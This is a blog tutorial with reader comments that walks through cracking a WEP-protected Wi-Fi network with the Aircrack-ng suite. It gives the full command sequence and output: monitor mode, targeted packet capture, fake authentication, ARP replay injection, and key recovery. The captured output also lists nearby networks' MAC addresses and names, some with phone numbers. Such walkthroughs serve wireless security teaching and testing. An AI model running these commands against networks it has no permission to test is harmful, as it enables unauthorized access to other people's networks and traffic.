Warning: include_once(/home/winit/hackedpotatoes.com/wp-content/plugins/wordsocial/wordsocial.php): failed to open stream: Permission denied in /home/winit/hackedpotatoes.com/wp-settings.php on line 303

Warning: include_once(): Failed opening '/home/winit/hackedpotatoes.com/wp-content/plugins/wordsocial/wordsocial.php' for inclusion (include_path='.:/usr/local/lib/php:/usr/local/php5/lib/pear') in /home/winit/hackedpotatoes.com/wp-settings.php on line 303

Warning: Cannot modify header information - headers already sent by (output started at /home/winit/hackedpotatoes.com/wp-settings.php:303) in /home/winit/hackedpotatoes.com/wp-content/plugins/wp-super-cache/wp-cache-phase2.php on line 60
Aircrack-ng WEP Crack Walkthrough «

Aircrack-ng WEP Crack Walkthrough

For some who are curious, here is a short high level walkthrough of the Aircrack-ng tools needed for sniffing packets and cracking WEP networks. I'll go over all the commands you will need to crack the average WEP key and some direction for further digging into WEP encrypted networks.

If you don't have Aircrack-ng you might wanna grab it and compile / install it for your architecture.

If you are using Ubuntu you can

sudo apt-get install aircrack-ng

which will pull it from the repo's. I believe most mainline distro's have the aircrack-ng binaries in their repo's.

There are several "pentesting" distro's, such as Backtrack I'll be doing this walkthrough with Backtrack 5 Gnome in a VirtualBox VM.

Installing Aircrack-ng gives you several different programs:

  • Airmon-ng puts your wireless card into monitor mode
  • Airodump-ng dumps packets from your card to your screen, or to a file with the -w flag
  • Aireplay-ng is a program that supports packet injection
  • Aircrack-ng is the program that finally cracks the network information gathered with the previous programs

The rest of the Aircrack-ng suite of programs are outside the scope of this walkthrough, but certainly something worth further reading here

Here are the basic commands, and the output you should see from running them. Pay attention to the syntax, as it is important.



root@bt:~# airmon-ng

Interface Chipset Driver

wlan0 Realtek RTL8187L rtl8187 - [phy0]




With no flags, Airmon-ng lists available cards, and driver as you can see above. To put the available card(s) into monitor mode, run the following command:


root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Realtek RTL8187L rtl8187 - [phy0]

(monitor mode enabled on mon0)

mon0 Realtek RTL8187L rtl8187 - [phy0]




As you can see, monitor mode is enabled on a new interface, mon0. This is the interface you will be using for most of the rest of the commands.

Next, run:

airmon-ng mon0

to give you this output:


CH 10 ][ Elapsed: 56 s ][ 2011-05-25 04:50


00:12:CF:A4:77:BD -24 72 0 0 11 54e. WEP WEP hackmepls

00:0F:66:C5:E3:0C -25 93 1 0 6 54e. OPN dd-wrt

00:0F:66:E3:84:78 -56 43 1 0 1 54e. OPN starbucks

00:C0:CA:28:35:E6 -65 24 0 0 5 11 . OPN DIV10(2.4GH.z)

00:1B:11:13:76:EC -72 3 0 0 9 54 . OPN Earth Link _ALJanoub 07705710497

00:15:6D:60:CA:07 -71 10 0 0 11 54e. OPN EarthLink@aswar(2)07705505735

BSSID STATION PWR Rate Lost Packets Probes

(not associated) 00:02:6F:4C:D8:C1 -59 0 - 1 58 34

00:0F:66:C5:E3:0C 0C:EE:E6:B9:C8:3C -43 0 - 1e 0 2

00:0F:66:C5:E3:0C 00:24:2B:70:5C:DE -51 0 - 1 0 7 USO-ALIALSALEM,TBC

00:0F:66:E3:84:78 B4:82:FE:63:8F:26 -56 0 - 1 0 1

00:0F:66:E3:84:78 00:23:15:51:FB:88 -63 0 - 1e 0 4

00:0F:66:E3:84:78 00:24:D6:26:38:48 -68 0 - 1e 36 11




This shows you quite a bit of information about surrounding networks, lets look at the top section.

  • BSSID gives you the MAC address of the access points (AP).
  • PWR gives you the dbi(?) of power you are receiving from the AP.
  • BEACONS shows the amount of beacons recieved from the AP.
  • DATA / #'s shows number of packets / packets per second on that network.
  • CH is the channel the AP uses.
  • MB shows the data rate the AP is able to use.
  • ENC is the encryption the AP uses, i.e. WEP/WPA/WPA2,RADIUS, etc.
  • CIPHER shows the cypher the encryption scheme uses, such as WEP,PSK,AES
  • ESSID, is the broadcast name of the network

The second section deals with clients:

  • BSSID is the MAC of the AP the client is connected to.
  • STATION is the client MAC address.
  • PWR is the client power level.
  • Rate is the data transmission rate from client to AP.
  • Lost shows "lost packets" useful for troubleshooting aireplay-ng attacks.
  • Packets shows "good" packets from client to AP
  • Probes is AP requests sent from client, useful for pineapple / Jasager attacks.

Now that you understand what the airodump-ng command spits out, try:

airodump-ng --help

This will give you all the usable flags for airodump-ng, pay special attention to:

-c limits the channel, for example -c 6 for scanning only channel 6.

--bssid filters AP's by bssid, useful for running airodump-ng on a single AP.

-w "writes" the output of airodump-ng to a series of files, that can be used to subsequently crack the network encryption and / or look back on data captured from a dump session.


root@bt:~# airodump-ng -c 11 --bssid 00:12:CF:A4:77:BD -w hackmepls mon0



This command dumps only data on channel 11, bssid 00:12:CF:A4:77:BD and writes it to a file named "hackmepls" note, that mon0 is the last "flag" on this command, this lets airodump-ng know which interface it needs to run on.


CH 11 ][ Elapsed: 11 mins ][ 2011-05-25 05:53


00:12:CF:A4:77:BD -27 86 6394 0 0 11 54e. WEP WEP hackmepls

BSSID STATION PWR Rate Lost Packets Probes




Note: you will want to continue running this command to capture packets generated by the next few commands.

This is not a huge problem, and of course, there is a specialized program designed to help with just such an issue.

aireplay-ng --help

Run that command, and read through the available flags, several of them will be familiar to you already. What we need to do is authenticate to the AP, so we can generate packet flow to and from it. We don't actually have to have the key to authenticate to the AP, we just need to trick it into thinking that we are.


root@bt:~# aireplay-ng -1 5 -a 00:12:CF:A4:77:BD mon0



This command designates -1 "fakeauth" every 5 seconds, to -a (a different AP flag then before, that is annoying) 00:12:CF:A4:77:BD and of course, running on mon0. There is also a -h option, for a "originating mac". If the AP uses mac address filtering, or you want to hide behind a random mac, this is the flag you want to use.

Running this command should give the following output:


root@bt:~# aireplay-ng -1 5 -a 00:12:CF:A4:77:BD mon0

No source MAC (-h) specified. Using the device MAC (00:C0:CA:39:62:44)

05:59:01 Waiting for beacon frame (BSSID: 00:12:CF:A4:77:BD) on channel 11

05:59:01 Sending Authentication Request (Open System) [ACK]

05:59:01 Authentication successful

05:59:01 Sending Association Request [ACK]

05:59:01 Association successful 🙂 (AID: 1)




Note the "Association successful" line, this is important, as you cannot continue until you have a successful auth. Some AP's get confused with lots of association requests, so you can back it off from 5 to 10, 15, or whatever works for you.

This might be a great time to open several tabs, or terminal windows, because this command must continue to run for the rest of the attack. Also, you should still be running airodump-ng to capture the packets we are about to generate.

Go back and check your airodump-ng command, or re-run it, and you should see your station authenticated to it:


CH 11 ][ Elapsed: 8 s ][ 2011-05-25 06:07


00:12:CF:A4:77:BD -35 96 78 0 0 11 54e. WEP WEP OPN hackmepls

BSSID STATION PWR Rate Lost Packets Probes

00:12:CF:A4:77:BD 00:C0:CA:39:62:44 0 0 - 1 8 8




Note, that you are authenticated and generating traffic with the AP. Now, to generate a LOT of traffic, we want several thousand packets to get the needed amount of ivs's.

aireplay-ng is our friend again here:

root@bt:~# aireplay-ng -3 -b 00:12:CF:A4:77:BD mon0

root@bt:~# aireplay-ng -3 -b 00:12:CF:A4:77:BD mon0

No source MAC (-h) specified. Using the device MAC (00:C0:CA:39:62:44)

03:48:10  Waiting for beacon frame (BSSID: 00:12:CF:A4:77:BD) on channel 1

Saving ARP requests in replay_arp-0627-034810.cap

You should also start airodump-ng to capture replies.

Read 2650 packets (got 0 ARP requests and 37 ACKs), sent 0 packets...(0 pps)

Once you get an ARP request this will replay it back to the AP, generating literally thousands of packets per second. Give yourself a few minutes to build up a good amount of packets.

root@bt:~# aircrack-ng hackmepls-01.cap

This calls the aircrack-ng program to read the hackmepls-01.cap file, which is the .cap file that the airodump-ng command saved. It should open up and begin cracking the iv's to give you the key.


Aircrack-ng 1.1 r1899

[00:00:18] Tested 3926 keys (got 51776 IVs)

KB depth byte(vote)

0 0/ 4 22(69632) 93(61184) 7B(60416) E1(60416) 4C(60160) 19(59904) 55(59648) 62(59392) CE(59392) 78(58624) 9C(58112) A2(58112)

1 0/ 1 88(77824) B9(63488) 9E(61184) 28(60928) 4D(60928) 5C(60416) EE(60416) 69(60160) 3D(59904) 52(59904) FF(59904) EC(58624)

2 0/ 1 88(72960) 1C(61696) 61(60160) 1E(59904) 38(59648) 4A(59392) 68(59136) 52(58880) 8A(58112) DD(58112) C4(57856) F6(57856)

3 0/ 9 88(67584) 6A(61440) A1(61440) 6E(60928) CF(59904) 1F(59648) 25(58624) FB(58368) FC(58368) 1B(58112) 08(57856) 6D(57856)

4 103/110 D0(52736) 08(52480) 36(52480) 4C(52480) 66(52480) D6(52480) DC(52480) F8(52480) 6D(52224) 93(52224) D7(52224) F2(52224)

KEY FOUND! [ 69:6e:73:65:63:75:72:65:77:65:70:30:31 ]

Decrypted correctly: 100%


Note, that it found the key in hex, vs the actual ascii key "insecurewep01" - this is because the iv's transmit the key in hex format.

I hope this writeup helps you to understand WEP encryption better, and remember - use this knowledge for good, not bad!


  • Danny

    hi there.

    I am new to backtrack5, but I am able to get all this process, but one thing that is killing me is the fact I can’t get enough ivs to continue the attack.
    is there any command that I can to this tutorial command to get an increase in ivs captu

    • Ana

      # aireplay-ng -3 -b 00:12:CF:A4:77:BD mon0 <- This one is for injecting which increases the ivs. It works (couple of seconds to a minute max, depending on your card). Unless the fake auth failed, in which case it won't work.

  • Bilbo

    Sometimes it is difficult to manage airodump-ng output files. i mean once i generate those csv and xml files then after i start looking into it so for large amount of data i can’t figure it out. so is there any tools or services available for analysis and visualization ? i have used this website and it is quite

    good, here i have shared my sample data have a look and also share any other sources if anyone knows. – http://bit.ly/1Nbfgm6